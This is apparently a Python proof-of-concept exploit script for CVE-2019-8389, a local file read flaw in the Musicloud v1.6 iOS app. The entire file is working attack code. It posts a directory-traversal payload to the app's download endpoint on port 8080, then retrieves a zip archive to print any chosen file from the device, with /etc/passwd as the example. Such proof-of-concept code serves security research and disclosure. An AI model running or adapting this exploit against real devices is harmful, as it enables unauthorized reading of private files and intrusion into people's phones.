#!/usr/bin/python
# Proof of concept for CVE-2019-8389
# Exploit author: Shawar Khan

import sys
import requests

def usage():
	print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n"

try:
	ip        =  sys.argv[1]
	path      =  sys.argv[2]
	downfile  =  path.split('/')[::-1][0]
	cur_fold  =  '../../../../../../..'+path[:-len(downfile)]

	print '''
	Musicloud v1.6 iOS - Local File Read exploit
	CVE: CVE-2019-8389
	Author: Shawar Khan ( @shawarkhanethicalhacker )
	'''

	def create_archive(file,payload):
		
		post_data = {
			"downfiles"  : file,
			"cur-folder" : payload
		}

		print "[+] Injecting Payload..."
		try:
			inj_status = requests.post('http://'+str(ip)+':8080/download.script',data=post_data)
		
			if "MusicPlayerArchive.zip" in inj_status.text and inj_status.status_code==200:
				print "[+] Payload successfully injected"
			elif inj_status.status_code==404:
				print "[+] Payload injection failed, File not found"
				exit()
			else:
				print "[+] Payload injection failed!"
				exit()
		except(requests.exceptions.ConnectionError) as err:
			print '[+] Payload injection failed! Connection refused.'
			exit()


	def retrieve_content():

		print "[+] Retrieving MusicPlayerArchive.zip"
		zip_content = requests.get('http://'+str(ip)+':8080/MusicPlayerArchive.zip')

		if zip_content.status_code==200:
			print "[+] Successfully retrieved MusicPlayerArchive.zip!\n\n[i] Printing content of %s:\n"%path
			archive = zip_content.text.splitlines()
			for i in range(2):
				archive.pop()
				archive.pop(0)

			print '\n'.join(archive)
		else:
			print "[+] Error retrieving content!"


	
	create_archive(downfile,cur_fold)
	retrieve_content()

except(IndexError):
	usage()